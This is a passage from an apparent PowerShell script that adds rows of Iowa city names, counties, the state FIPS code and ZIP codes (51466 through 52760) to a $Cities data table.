lake","Sac","Iowa","IA","19","51466") + $null = $Cities.Rows.Add("Westside","Crawford","Iowa","IA","19","51467") + $null = $Cities.Rows.Add("Zcta 514hh","Calhoun","Iowa","IA","19","514HH") + $null = $Cities.Rows.Add("Manawa","Pottawattamie","Iowa","IA","19","51501") + $null = $Cities.Rows.Add("Council bluffs","Pottawattamie","Iowa","IA","19","51502") + $null = $Cities.Rows.Add("Council bluffs","Pottawattamie","Iowa","IA","19","51503") + $null = $Cities.Rows.Add("Carter lake","Pottawattamie","Iowa","IA","19","51510") + $null = $Cities.Rows.Add("Arion","Crawford","Iowa","IA","19","51520") + $null = $Cities.Rows.Add("Avoca","Pottawattamie","Iowa","IA","19","51521") + $null = $Cities.Rows.Add("Blencoe","Monona","Iowa","IA","19","51523") + $null = $Cities.Rows.Add("Carson","Pottawattamie","Iowa","IA","19","51525") + $null = $Cities.Rows.Add("Crescent","Pottawattamie","Iowa","IA","19","51526") + $null = $Cities.Rows.Add("Earling","Shelby","Iowa","IA","19","51527") + $null = $Cities.Rows.Add("Dow city","Crawford","Iowa","IA","19","51528") + $null = $Cities.Rows.Add("Earling","Harrison","Iowa","IA","19","51529") + $null = $Cities.Rows.Add("Earling","Shelby","Iowa","IA","19","51530") + $null = $Cities.Rows.Add("Elk horn","Shelby","Iowa","IA","19","51531") + $null = $Cities.Rows.Add("Elliott","Montgomery","Iowa","IA","19","51532") + $null = $Cities.Rows.Add("Emerson","Mills","Iowa","IA","19","51533") + $null = $Cities.Rows.Add("Glenwood","Mills","Iowa","IA","19","51534") + $null = $Cities.Rows.Add("Griswold","Cass","Iowa","IA","19","51535") + $null = $Cities.Rows.Add("Hancock","Pottawattamie","Iowa","IA","19","51536") + $null = $Cities.Rows.Add("Harlan","Shelby","Iowa","IA","19","51537") + $null = $Cities.Rows.Add("Hastings","Mills","Iowa","IA","19","51540") + $null = $Cities.Rows.Add("Henderson","Mills","Iowa","IA","19","51541") + $null = $Cities.Rows.Add("Honey creek","Pottawattamie","Iowa","IA","19","51542") + $null = $Cities.Rows.Add("Kimballton","Audubon","Iowa","IA","19","51543") + $null = $Cities.Rows.Add("Lewis","Cass","Iowa","IA","19","51544") + $null = $Cities.Rows.Add("Little sioux","Harrison","Iowa","IA","19","51545") + $null = $Cities.Rows.Add("Logan","Harrison","Iowa","IA","19","51546") + $null = $Cities.Rows.Add("Mc clelland","Pottawattamie","Iowa","IA","19","51548") + $null = $Cities.Rows.Add("Macedonia","Pottawattamie","Iowa","IA","19","51549") + $null = $Cities.Rows.Add("Magnolia","Harrison","Iowa","IA","19","51550") + $null = $Cities.Rows.Add("Malvern","Mills","Iowa","IA","19","51551") + $null = $Cities.Rows.Add("Marne","Cass","Iowa","IA","19","51552") + $null = $Cities.Rows.Add("Minden","Pottawattamie","Iowa","IA","19","51553") + $null = $Cities.Rows.Add("Mineola","Mills","Iowa","IA","19","51554") + $null = $Cities.Rows.Add("Missouri valley","Harrison","Iowa","IA","19","51555") + $null = $Cities.Rows.Add("Modale","Harrison","Iowa","IA","19","51556") + $null = $Cities.Rows.Add("Mondamin","Harrison","Iowa","IA","19","51557") + $null = $Cities.Rows.Add("Moorhead","Monona","Iowa","IA","19","51558") + $null = $Cities.Rows.Add("Neola","Pottawattamie","Iowa","IA","19","51559") + $null = $Cities.Rows.Add("Oakland","Pottawattamie","Iowa","IA","19","51560") + $null = $Cities.Rows.Add("Pacific junction","Mills","Iowa","IA","19","51561") + $null = $Cities.Rows.Add("Panama","Shelby","Iowa","IA","19","51562") + $null = $Cities.Rows.Add("Persia","Harrison","Iowa","IA","19","51563") + $null = $Cities.Rows.Add("Pisgah","Harrison","Iowa","IA","19","51564") + $null = $Cities.Rows.Add("Portsmouth","Shelby","Iowa","IA","19","51565") + $null = $Cities.Rows.Add("Red oak","Montgomery","Iowa","IA","19","51566") + $null = $Cities.Rows.Add("Shelby","Shelby","Iowa","IA","19","51570") + $null = $Cities.Rows.Add("Silver city","Mills","Iowa","IA","19","51571") + $null = $Cities.Rows.Add("Soldier","Monona","Iowa","IA","19","51572") + $null = $Cities.Rows.Add("Stanton","Montgomery","Iowa","IA","19","51573") + $null = $Cities.Rows.Add("Tennant","Shelby","Iowa","IA","19","51574") + $null = $Cities.Rows.Add("Treynor","Pottawattamie","Iowa","IA","19","51575") + $null = $Cities.Rows.Add("Underwood","Pottawattamie","Iowa","IA","19","51576") + $null = $Cities.Rows.Add("Walnut","Pottawattamie","Iowa","IA","19","51577") + $null = $Cities.Rows.Add("Westphalia","Shelby","Iowa","IA","19","51578") + $null = $Cities.Rows.Add("Woodbine","Harrison","Iowa","IA","19","51579") + $null = $Cities.Rows.Add("Zcta 515hh","Harrison","Iowa","IA","19","515HH") + $null = $Cities.Rows.Add("Shenandoah","Page","Iowa","IA","19","51601") + $null = $Cities.Rows.Add("Blanchard","Page","Iowa","IA","19","51630") + $null = $Cities.Rows.Add("Braddyville","Page","Iowa","IA","19","51631") + $null = $Cities.Rows.Add("Clarinda","Page","Iowa","IA","19","51632") + $null = $Cities.Rows.Add("Coin","Page","Iowa","IA","19","51636") + $null = $Cities.Rows.Add("College springs","Page","Iowa","IA","19","51637") + $null = $Cities.Rows.Add("Essex","Page","Iowa","IA","19","51638") + $null = $Cities.Rows.Add("Farragut","Fremont","Iowa","IA","19","51639") + $null = $Cities.Rows.Add("Hamburg","Fremont","Iowa","IA","19","51640") + $null = $Cities.Rows.Add("Imogene","Fremont","Iowa","IA","19","51645") + $null = $Cities.Rows.Add("New market","Taylor","Iowa","IA","19","51646") + $null = $Cities.Rows.Add("Northboro","Page","Iowa","IA","19","51647") + $null = $Cities.Rows.Add("Percival","Fremont","Iowa","IA","19","51648") + $null = $Cities.Rows.Add("Randolph","Fremont","Iowa","IA","19","51649") + $null = $Cities.Rows.Add("Riverton","Fremont","Iowa","IA","19","51650") + $null = $Cities.Rows.Add("Sidney","Fremont","Iowa","IA","19","51652") + $null = $Cities.Rows.Add("Tabor","Fremont","Iowa","IA","19","51653") + $null = $Cities.Rows.Add("Thurman","Fremont","Iowa","IA","19","51654") + $null = $Cities.Rows.Add("Zcta 516hh","Fremont","Iowa","IA","19","516HH") + $null = $Cities.Rows.Add("Dubuque","Dubuque","Iowa","IA","19","52001") + $null = $Cities.Rows.Add("Dubuque","Dubuque","Iowa","IA","19","52002") + $null = $Cities.Rows.Add("Dubuque","Dubuque","Iowa","IA","19","52003") + $null = $Cities.Rows.Add("Andrew","Jackson","Iowa","IA","19","52030") + $null = $Cities.Rows.Add("Bellevue","Jackson","Iowa","IA","19","52031") + $null = $Cities.Rows.Add("Bernard","Dubuque","Iowa","IA","19","52032") + $null = $Cities.Rows.Add("Cascade","Dubuque","Iowa","IA","19","52033") + $null = $Cities.Rows.Add("Colesburg","Delaware","Iowa","IA","19","52035") + $null = $Cities.Rows.Add("Delaware","Delaware","Iowa","IA","19","52036") + $null = $Cities.Rows.Add("Delmar","Clinton","Iowa","IA","19","52037") + $null = $Cities.Rows.Add("Dundee","Delaware","Iowa","IA","19","52038") + $null = $Cities.Rows.Add("Durango","Dubuque","Iowa","IA","19","52039") + $null = $Cities.Rows.Add("Dyersville","Dubuque","Iowa","IA","19","52040") + $null = $Cities.Rows.Add("Earlville","Delaware","Iowa","IA","19","52041") + $null = $Cities.Rows.Add("Edgewood","Clayton","Iowa","IA","19","52042") + $null = $Cities.Rows.Add("Elkader","Clayton","Iowa","IA","19","52043") + $null = $Cities.Rows.Add("Elkport","Clayton","Iowa","IA","19","52044") + $null = $Cities.Rows.Add("Epworth","Dubuque","Iowa","IA","19","52045") + $null = $Cities.Rows.Add("Farley","Dubuque","Iowa","IA","19","52046") + $null = $Cities.Rows.Add("Farmersburg","Clayton","Iowa","IA","19","52047") + $null = $Cities.Rows.Add("Garber","Clayton","Iowa","IA","19","52048") + $null = $Cities.Rows.Add("Garnavillo","Clayton","Iowa","IA","19","52049") + $null = $Cities.Rows.Add("Greeley","Delaware","Iowa","IA","19","52050") + $null = $Cities.Rows.Add("Guttenberg","Clayton","Iowa","IA","19","52052") + $null = $Cities.Rows.Add("Holy cross","Dubuque","Iowa","IA","19","52053") + $null = $Cities.Rows.Add("La motte","Jackson","Iowa","IA","19","52054") + $null = $Cities.Rows.Add("Luxemburg","Dubuque","Iowa","IA","19","52056") + $null = $Cities.Rows.Add("Manchester","Delaware","Iowa","IA","19","52057") + $null = $Cities.Rows.Add("Maquoketa","Jackson","Iowa","IA","19","52060") + $null = $Cities.Rows.Add("Miles","Jackson","Iowa","IA","19","52064") + $null = $Cities.Rows.Add("New vienna","Dubuque","Iowa","IA","19","52065") + $null = $Cities.Rows.Add("North buena vist","Clayton","Iowa","IA","19","52066") + $null = $Cities.Rows.Add("Peosta","Dubuque","Iowa","IA","19","52068") + $null = $Cities.Rows.Add("Preston","Jackson","Iowa","IA","19","52069") + $null = $Cities.Rows.Add("Sabula","Jackson","Iowa","IA","19","52070") + $null = $Cities.Rows.Add("Saint donatus","Jackson","Iowa","IA","19","52071") + $null = $Cities.Rows.Add("Saint olaf","Clayton","Iowa","IA","19","52072") + $null = $Cities.Rows.Add("Sherrill","Dubuque","Iowa","IA","19","52073") + $null = $Cities.Rows.Add("Spragueville","Jackson","Iowa","IA","19","52074") + $null = $Cities.Rows.Add("Springbrook","Jackson","Iowa","IA","19","52075") + $null = $Cities.Rows.Add("Strawberry point","Clayton","Iowa","IA","19","52076") + $null = $Cities.Rows.Add("Volga","Clayton","Iowa","IA","19","52077") + $null = $Cities.Rows.Add("Worthington","Dubuque","Iowa","IA","19","52078") + $null = $Cities.Rows.Add("Zwingle","Jackson","Iowa","IA","19","52079") + $null = $Cities.Rows.Add("Zcta 520hh","Clayton","Iowa","IA","19","520HH") + $null = $Cities.Rows.Add("Decorah","Winneshiek","Iowa","IA","19","52101") + $null = $Cities.Rows.Add("Calmar","Winneshiek","Iowa","IA","19","52132") + $null = $Cities.Rows.Add("Castalia","Winneshiek","Iowa","IA","19","52133") + $null = $Cities.Rows.Add("Chester","Howard","Iowa","IA","19","52134") + $null = $Cities.Rows.Add("Clermont","Fayette","Iowa","IA","19","52135") + $null = $Cities.Rows.Add("Cresco","Howard","Iowa","IA","19","52136") + $null = $Cities.Rows.Add("Dorchester","Allamakee","Iowa","IA","19","52140") + $null = $Cities.Rows.Add("Elgin","Fayette","Iowa","IA","19","52141") + $null = $Cities.Rows.Add("Fayette","Fayette","Iowa","IA","19","52142") + $null = $Cities.Rows.Add("Fort atkinson","Winneshiek","Iowa","IA","19","52144") + $null = $Cities.Rows.Add("Harpers ferry","Allamakee","Iowa","IA","19","52146") + $null = $Cities.Rows.Add("Hawkeye","Fayette","Iowa","IA","19","52147") + $null = $Cities.Rows.Add("Lansing","Allamakee","Iowa","IA","19","52151") + $null = $Cities.Rows.Add("Lawler","Chickasaw","Iowa","IA","19","52154") + $null = $Cities.Rows.Add("Lime springs","Howard","Iowa","IA","19","52155") + $null = $Cities.Rows.Add("Luana","Clayton","Iowa","IA","19","52156") + $null = $Cities.Rows.Add("Mc gregor","Clayton","Iowa","IA","19","52157") + $null = $Cities.Rows.Add("Marquette","Clayton","Iowa","IA","19","52158") + $null = $Cities.Rows.Add("Monona","Clayton","Iowa","IA","19","52159") + $null = $Cities.Rows.Add("New albin","Allamakee","Iowa","IA","19","52160") + $null = $Cities.Rows.Add("Ossian","Winneshiek","Iowa","IA","19","52161") + $null = $Cities.Rows.Add("Postville","Allamakee","Iowa","IA","19","52162") + $null = $Cities.Rows.Add("Protivin","Howard","Iowa","IA","19","52163") + $null = $Cities.Rows.Add("Randalia","Fayette","Iowa","IA","19","52164") + $null = $Cities.Rows.Add("Ridgeway","Winneshiek","Iowa","IA","19","52165") + $null = $Cities.Rows.Add("Saint lucas","Fayette","Iowa","IA","19","52166") + $null = $Cities.Rows.Add("Spillville","Winneshiek","Iowa","IA","19","52168") + $null = $Cities.Rows.Add("Wadena","Fayette","Iowa","IA","19","52169") + $null = $Cities.Rows.Add("Waterville","Allamakee","Iowa","IA","19","52170") + $null = $Cities.Rows.Add("Waucoma","Fayette","Iowa","IA","19","52171") + $null = $Cities.Rows.Add("Waukon","Allamakee","Iowa","IA","19","52172") + $null = $Cities.Rows.Add("Eldorado","Fayette","Iowa","IA","19","52175") + $null = $Cities.Rows.Add("Zcta 521hh","Allamakee","Iowa","IA","19","521HH") + $null = $Cities.Rows.Add("Ainsworth","Washington","Iowa","IA","19","52201") + $null = $Cities.Rows.Add("Alburnett","Linn","Iowa","IA","19","52202") + $null = $Cities.Rows.Add("Amana","Iowa","Iowa","IA","19","52203") + $null = $Cities.Rows.Add("Anamosa","Jones","Iowa","IA","19","52205") + $null = $Cities.Rows.Add("Atkins","Benton","Iowa","IA","19","52206") + $null = $Cities.Rows.Add("Baldwin","Jackson","Iowa","IA","19","52207") + $null = $Cities.Rows.Add("Belle plaine","Benton","Iowa","IA","19","52208") + $null = $Cities.Rows.Add("Blairstown","Benton","Iowa","IA","19","52209") + $null = $Cities.Rows.Add("Brandon","Buchanan","Iowa","IA","19","52210") + $null = $Cities.Rows.Add("Brooklyn","Poweshiek","Iowa","IA","19","52211") + $null = $Cities.Rows.Add("Center junction","Jones","Iowa","IA","19","52212") + $null = $Cities.Rows.Add("Center point","Linn","Iowa","IA","19","52213") + $null = $Cities.Rows.Add("Central city","Linn","Iowa","IA","19","52214") + $null = $Cities.Rows.Add("Chelsea","Tama","Iowa","IA","19","52215") + $null = $Cities.Rows.Add("Clarence","Cedar","Iowa","IA","19","52216") + $null = $Cities.Rows.Add("Clutier","Tama","Iowa","IA","19","52217") + $null = $Cities.Rows.Add("Coggon","Linn","Iowa","IA","19","52218") + $null = $Cities.Rows.Add("Prairieburg","Linn","Iowa","IA","19","52219") + $null = $Cities.Rows.Add("Conroy","Iowa","Iowa","IA","19","52220") + $null = $Cities.Rows.Add("Zcta 52221","Poweshiek","Iowa","IA","19","52221") + $null = $Cities.Rows.Add("Deep river","Poweshiek","Iowa","IA","19","52222") + $null = $Cities.Rows.Add("Delhi","Delaware","Iowa","IA","19","52223") + $null = $Cities.Rows.Add("Dysart","Tama","Iowa","IA","19","52224") + $null = $Cities.Rows.Add("Elberon","Tama","Iowa","IA","19","52225") + $null = $Cities.Rows.Add("Elwood","Clinton","Iowa","IA","19","52226") + $null = $Cities.Rows.Add("Ely","Linn","Iowa","IA","19","52227") + $null = $Cities.Rows.Add("Fairfax","Linn","Iowa","IA","19","52228") + $null = $Cities.Rows.Add("Garrison","Benton","Iowa","IA","19","52229") + $null = $Cities.Rows.Add("Harper","Keokuk","Iowa","IA","19","52231") + $null = $Cities.Rows.Add("Hartwick","Poweshiek","Iowa","IA","19","52232") + $null = $Cities.Rows.Add("Hiawatha","Linn","Iowa","IA","19","52233") + $null = $Cities.Rows.Add("Hills","Johnson","Iowa","IA","19","52235") + $null = $Cities.Rows.Add("Homestead","Iowa","Iowa","IA","19","52236") + $null = $Cities.Rows.Add("Hopkinton","Delaware","Iowa","IA","19","52237") + $null = $Cities.Rows.Add("Iowa city","Johnson","Iowa","IA","19","52240") + $null = $Cities.Rows.Add("Coralville","Johnson","Iowa","IA","19","52241") + $null = $Cities.Rows.Add("Iowa city","Johnson","Iowa","IA","19","52242") + $null = $Cities.Rows.Add("Iowa city","Johnson","Iowa","IA","19","52245") + $null = $Cities.Rows.Add("Iowa city","Johnson","Iowa","IA","19","52246") + $null = $Cities.Rows.Add("Kalona","Washington","Iowa","IA","19","52247") + $null = $Cities.Rows.Add("Keota","Keokuk","Iowa","IA","19","52248") + $null = $Cities.Rows.Add("Keystone","Benton","Iowa","IA","19","52249") + $null = $Cities.Rows.Add("Ladora","Iowa","Iowa","IA","19","52251") + $null = $Cities.Rows.Add("Lisbon","Linn","Iowa","IA","19","52253") + $null = $Cities.Rows.Add("Lost nation","Clinton","Iowa","IA","19","52254") + $null = $Cities.Rows.Add("Lowden","Cedar","Iowa","IA","19","52255") + $null = $Cities.Rows.Add("Luzerne","Benton","Iowa","IA","19","52257") + $null = $Cities.Rows.Add("Zcta 522hh","Benton","Iowa","IA","19","522HH") + $null = $Cities.Rows.Add("Marengo","Iowa","Iowa","IA","19","52301") + $null = $Cities.Rows.Add("Marion","Linn","Iowa","IA","19","52302") + $null = $Cities.Rows.Add("Martelle","Jones","Iowa","IA","19","52305") + $null = $Cities.Rows.Add("Mechanicsville","Cedar","Iowa","IA","19","52306") + $null = $Cities.Rows.Add("Middle amana","Iowa","Iowa","IA","19","52307") + $null = $Cities.Rows.Add("Millersburg","Iowa","Iowa","IA","19","52308") + $null = $Cities.Rows.Add("Monmouth","Jackson","Iowa","IA","19","52309") + $null = $Cities.Rows.Add("Monticello","Jones","Iowa","IA","19","52310") + $null = $Cities.Rows.Add("Morley","Jones","Iowa","IA","19","52312") + $null = $Cities.Rows.Add("Mount auburn","Benton","Iowa","IA","19","52313") + $null = $Cities.Rows.Add("Mount vernon","Linn","Iowa","IA","19","52314") + $null = $Cities.Rows.Add("Newhall","Benton","Iowa","IA","19","52315") + $null = $Cities.Rows.Add("North english","Iowa","Iowa","IA","19","52316") + $null = $Cities.Rows.Add("North liberty","Johnson","Iowa","IA","19","52317") + $null = $Cities.Rows.Add("Norway","Benton","Iowa","IA","19","52318") + $null = $Cities.Rows.Add("Olin","Jones","Iowa","IA","19","52320") + $null = $Cities.Rows.Add("Onslow","Jones","Iowa","IA","19","52321") + $null = $Cities.Rows.Add("Oxford","Johnson","Iowa","IA","19","52322") + $null = $Cities.Rows.Add("Oxford junction","Jones","Iowa","IA","19","52323") + $null = $Cities.Rows.Add("Palo","Linn","Iowa","IA","19","52324") + $null = $Cities.Rows.Add("Parnell","Iowa","Iowa","IA","19","52325") + $null = $Cities.Rows.Add("Quasqueton","Buchanan","Iowa","IA","19","52326") + $null = $Cities.Rows.Add("Riverside","Washington","Iowa","IA","19","52327") + $null = $Cities.Rows.Add("Robins","Linn","Iowa","IA","19","52328") + $null = $Cities.Rows.Add("Rowley","Buchanan","Iowa","IA","19","52329") + $null = $Cities.Rows.Add("Ryan","Delaware","Iowa","IA","19","52330") + $null = $Cities.Rows.Add("Shellsburg","Benton","Iowa","IA","19","52332") + $null = $Cities.Rows.Add("Solon","Johnson","Iowa","IA","19","52333") + $null = $Cities.Rows.Add("South amana","Iowa","Iowa","IA","19","52334") + $null = $Cities.Rows.Add("South english","Keokuk","Iowa","IA","19","52335") + $null = $Cities.Rows.Add("Springville","Linn","Iowa","IA","19","52336") + $null = $Cities.Rows.Add("Stanwood","Cedar","Iowa","IA","19","52337") + $null = $Cities.Rows.Add("Swisher","Johnson","Iowa","IA","19","52338") + $null = $Cities.Rows.Add("Tama","Tama","Iowa","IA","19","52339") + $null = $Cities.Rows.Add("Tiffin","Johnson","Iowa","IA","19","52340") + $null = $Cities.Rows.Add("Toddville","Linn","Iowa","IA","19","52341") + $null = $Cities.Rows.Add("Toledo","Tama","Iowa","IA","19","52342") + $null = $Cities.Rows.Add("Urbana","Benton","Iowa","IA","19","52345") + $null = $Cities.Rows.Add("Van horne","Benton","Iowa","IA","19","52346") + $null = $Cities.Rows.Add("Victor","Iowa","Iowa","IA","19","52347") + $null = $Cities.Rows.Add("Vining","Tama","Iowa","IA","19","52348") + $null = $Cities.Rows.Add("Vinton","Benton","Iowa","IA","19","52349") + $null = $Cities.Rows.Add("Walford","Benton","Iowa","IA","19","52351") + $null = $Cities.Rows.Add("Walker","Linn","Iowa","IA","19","52352") + $null = $Cities.Rows.Add("Washington","Washington","Iowa","IA","19","52353") + $null = $Cities.Rows.Add("Watkins","Benton","Iowa","IA","19","52354") + $null = $Cities.Rows.Add("Webster","Keokuk","Iowa","IA","19","52355") + $null = $Cities.Rows.Add("Wellman","Washington","Iowa","IA","19","52356") + $null = $Cities.Rows.Add("West branch","Cedar","Iowa","IA","19","52358") + $null = $Cities.Rows.Add("West chester","Washington","Iowa","IA","19","52359") + $null = $Cities.Rows.Add("Williamsburg","Iowa","Iowa","IA","19","52361") + $null = $Cities.Rows.Add("Wyoming","Jones","Iowa","IA","19","52362") + $null = $Cities.Rows.Add("Zcta 523hh","Benton","Iowa","IA","19","523HH") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52401") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52402") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52403") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52404") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52405") + $null = $Cities.Rows.Add("Cedar rapids","Linn","Iowa","IA","19","52411") + $null = $Cities.Rows.Add("Zcta 524hh","Linn","Iowa","IA","19","524HH") + $null = $Cities.Rows.Add("Highland center","Wapello","Iowa","IA","19","52501") + $null = $Cities.Rows.Add("Agency","Wapello","Iowa","IA","19","52530") + $null = $Cities.Rows.Add("Albia","Monroe","Iowa","IA","19","52531") + $null = $Cities.Rows.Add("Batavia","Jefferson","Iowa","IA","19","52533") + $null = $Cities.Rows.Add("Beacon","Mahaska","Iowa","IA","19","52534") + $null = $Cities.Rows.Add("Birmingham","Van Buren","Iowa","IA","19","52535") + $null = $Cities.Rows.Add("Blakesburg","Wapello","Iowa","IA","19","52536") + $null = $Cities.Rows.Add("Bloomfield","Davis","Iowa","IA","19","52537") + $null = $Cities.Rows.Add("Brighton","Washington","Iowa","IA","19","52540") + $null = $Cities.Rows.Add("Cantril","Van Buren","Iowa","IA","19","52542") + $null = $Cities.Rows.Add("Cedar","Mahaska","Iowa","IA","19","52543") + $null = $Cities.Rows.Add("Centerville","Appanoose","Iowa","IA","19","52544") + $null = $Cities.Rows.Add("Chillicothe","Wapello","Iowa","IA","19","52548") + $null = $Cities.Rows.Add("Cincinnati","Appanoose","Iowa","IA","19","52549") + $null = $Cities.Rows.Add("Delta","Keokuk","Iowa","IA","19","52550") + $null = $Cities.Rows.Add("Douds","Van Buren","Iowa","IA","19","52551") + $null = $Cities.Rows.Add("Drakesville","Davis","Iowa","IA","19","52552") + $null = $Cities.Rows.Add("Eddyville","Wapello","Iowa","IA","19","52553") + $null = $Cities.Rows.Add("Eldon","Wapello","Iowa","IA","19","52554") + $null = $Cities.Rows.Add("Exline","Appanoose","Iowa","IA","19","52555") + $null = $Cities.Rows.Add("Fairfield","Jefferson","Iowa","IA","19","52556") + $null = $Cities.Rows.Add("Floris","Davis","Iowa","IA","19","52560") + $null = $Cities.Rows.Add("Fremont","Mahaska","Iowa","IA","19","52561") + $null = $Cities.Rows.Add("Hayesville","Keokuk","Iowa","IA","19","52562") + $null = $Cities.Rows.Add("Hedrick","Keokuk","Iowa","IA","19","52563") + $null = $Cities.Rows.Add("Keosauqua","Van Buren","Iowa","IA","19","52565") + $null = $Cities.Rows.Add("Kirkville","Wapello","Iowa","IA","19","52566") + $null = $Cities.Rows.Add("Libertyville","Jefferson","Iowa","IA","19","52567") + $null = $Cities.Rows.Add("Martinsburg","Keokuk","Iowa","IA","19","52568") + $null = $Cities.Rows.Add("Melrose","Monroe","Iowa","IA","19","52569") + $null = $Cities.Rows.Add("Milton","Van Buren","Iowa","IA","19","52570") + $null = $Cities.Rows.Add("Moravia","Appanoose","Iowa","IA","19","52571") + $null = $Cities.Rows.Add("Moulton","Appanoose","Iowa","IA","19","52572") + $null = $Cities.Rows.Add("Mount sterling","Van Buren","Iowa","IA","19","52573") + $null = $Cities.Rows.Add("Mystic","Appanoose","Iowa","IA","19","52574") + $null = $Cities.Rows.Add("Ollie","Keokuk","Iowa","IA","19","52576") + $null = $Cities.Rows.Add("Oskaloosa","Mahaska","Iowa","IA","19","52577") + $null = $Cities.Rows.Add("Packwood","Jefferson","Iowa","IA","19","52580") + $null = $Cities.Rows.Add("Plano","Appanoose","Iowa","IA","19","52581") + $null = $Cities.Rows.Add("Promise city","Wayne","Iowa","IA","19","52583") + $null = $Cities.Rows.Add("Pulaski","Davis","Iowa","IA","19","52584") + $null = $Cities.Rows.Add("Richland","Keokuk","Iowa","IA","19","52585") + $null = $Cities.Rows.Add("Rose hill","Mahaska","Iowa","IA","19","52586") + $null = $Cities.Rows.Add("Selma","Van Buren","Iowa","IA","19","52588") + $null = $Cities.Rows.Add("Seymour","Wayne","Iowa","IA","19","52590") + $null = $Cities.Rows.Add("Sigourney","Keokuk","Iowa","IA","19","52591") + $null = $Cities.Rows.Add("Udell","Appanoose","Iowa","IA","19","52593") + $null = $Cities.Rows.Add("Unionville","Appanoose","Iowa","IA","19","52594") + $null = $Cities.Rows.Add("University park","Mahaska","Iowa","IA","19","52595") + $null = $Cities.Rows.Add("Zcta 525hh","Appanoose","Iowa","IA","19","525HH") + $null = $Cities.Rows.Add("Burlington","Des Moines","Iowa","IA","19","52601") + $null = $Cities.Rows.Add("Argyle","Lee","Iowa","IA","19","52619") + $null = $Cities.Rows.Add("Bonaparte","Van Buren","Iowa","IA","19","52620") + $null = $Cities.Rows.Add("Crawfordsville","Washington","Iowa","IA","19","52621") + $null = $Cities.Rows.Add("Danville","Des Moines","Iowa","IA","19","52623") + $null = $Cities.Rows.Add("Denmark","Lee","Iowa","IA","19","52624") + $null = $Cities.Rows.Add("Donnellson","Lee","Iowa","IA","19","52625") + $null = $Cities.Rows.Add("Farmington","Van Buren","Iowa","IA","19","52626") + $null = $Cities.Rows.Add("Fort madison","Lee","Iowa","IA","19","52627") + $null = $Cities.Rows.Add("Hillsboro","Van Buren","Iowa","IA","19","52630") + $null = $Cities.Rows.Add("Houghton","Lee","Iowa","IA","19","52631") + $null = $Cities.Rows.Add("Keokuk","Lee","Iowa","IA","19","52632") + $null = $Cities.Rows.Add("Lockridge","Jefferson","Iowa","IA","19","52635") + $null = $Cities.Rows.Add("Mediapolis","Des Moines","Iowa","IA","19","52637") + $null = $Cities.Rows.Add("Middletown","Des Moines","Iowa","IA","19","52638") + $null = $Cities.Rows.Add("Montrose","Lee","Iowa","IA","19","52639") + $null = $Cities.Rows.Add("Morning sun","Louisa","Iowa","IA","19","52640") + $null = $Cities.Rows.Add("Mount pleasant","Henry","Iowa","IA","19","52641") + $null = $Cities.Rows.Add("Mount union","Henry","Iowa","IA","19","52644") + $null = $Cities.Rows.Add("New london","Henry","Iowa","IA","19","52645") + $null = $Cities.Rows.Add("Oakville","Louisa","Iowa","IA","19","52646") + $null = $Cities.Rows.Add("Olds","Henry","Iowa","IA","19","52647") + $null = $Cities.Rows.Add("Salem","Henry","Iowa","IA","19","52649") + $null = $Cities.Rows.Add("Sperry","Des Moines","Iowa","IA","19","52650") + $null = $Cities.Rows.Add("Stockport","Van Buren","Iowa","IA","19","52651") + $null = $Cities.Rows.Add("Swedesburg","Henry","Iowa","IA","19","52652") + $null = $Cities.Rows.Add("Wapello","Louisa","Iowa","IA","19","52653") + $null = $Cities.Rows.Add("Wayland","Henry","Iowa","IA","19","52654") + $null = $Cities.Rows.Add("West burlington","Des Moines","Iowa","IA","19","52655") + $null = $Cities.Rows.Add("West point","Lee","Iowa","IA","19","52656") + $null = $Cities.Rows.Add("Wever","Lee","Iowa","IA","19","52658") + $null = $Cities.Rows.Add("Winfield","Henry","Iowa","IA","19","52659") + $null = $Cities.Rows.Add("Yarmouth","Des Moines","Iowa","IA","19","52660") + $null = $Cities.Rows.Add("Zcta 526hh","Des Moines","Iowa","IA","19","526HH") + $null = $Cities.Rows.Add("Andover","Clinton","Iowa","IA","19","52701") + $null = $Cities.Rows.Add("Atalissa","Muscatine","Iowa","IA","19","52720") + $null = $Cities.Rows.Add("Bennett","Cedar","Iowa","IA","19","52721") + $null = $Cities.Rows.Add("Bettendorf","Scott","Iowa","IA","19","52722") + $null = $Cities.Rows.Add("Blue grass","Scott","Iowa","IA","19","52726") + $null = $Cities.Rows.Add("Bryant","Clinton","Iowa","IA","19","52727") + $null = $Cities.Rows.Add("Buffalo","Scott","Iowa","IA","19","52728") + $null = $Cities.Rows.Add("Calamus","Clinton","Iowa","IA","19","52729") + $null = $Cities.Rows.Add("Camanche","Clinton","Iowa","IA","19","52730") + $null = $Cities.Rows.Add("Charlotte","Clinton","Iowa","IA","19","52731") + $null = $Cities.Rows.Add("Clinton","Clinton","Iowa","IA","19","52732") + $null = $Cities.Rows.Add("Columbus city","Louisa","Iowa","IA","19","52737") + $null = $Cities.Rows.Add("Columbus junctio","Louisa","Iowa","IA","19","52738") + $null = $Cities.Rows.Add("Conesville","Muscatine","Iowa","IA","19","52739") + $null = $Cities.Rows.Add("De witt","Clinton","Iowa","IA","19","52742") + $null = $Cities.Rows.Add("Big rock","Scott","Iowa","IA","19","52745") + $null = $Cities.Rows.Add("Donahue","Scott","Iowa","IA","19","52746") + $null = $Cities.Rows.Add("Durant","Cedar","Iowa","IA","19","52747") + $null = $Cities.Rows.Add("Eldridge","Scott","Iowa","IA","19","52748") + $null = $Cities.Rows.Add("Fruitland","Muscatine","Iowa","IA","19","52749") + $null = $Cities.Rows.Add("Goose lake","Clinton","Iowa","IA","19","52750") + $null = $Cities.Rows.Add("Grand mound","Clinton","Iowa","IA","19","52751") + $null = $Cities.Rows.Add("Grandview","Louisa","Iowa","IA","19","52752") + $null = $Cities.Rows.Add("Le claire","Scott","Iowa","IA","19","52753") + $null = $Cities.Rows.Add("Letts","Louisa","Iowa","IA","19","52754") + $null = $Cities.Rows.Add("Lone tree","Johnson","Iowa","IA","19","52755") + $null = $Cities.Rows.Add("Long grove","Scott","Iowa","IA","19","52756") + $null = $Cities.Rows.Add("Low moor","Clinton","Iowa","IA","19","52757") + $null = $Cities.Rows.Add("Mc causland","Scott","Iowa","IA","19","52758") + $null = $Cities.Rows.Add("Moscow","Muscatine","Iowa","IA","19","52760") + $null = 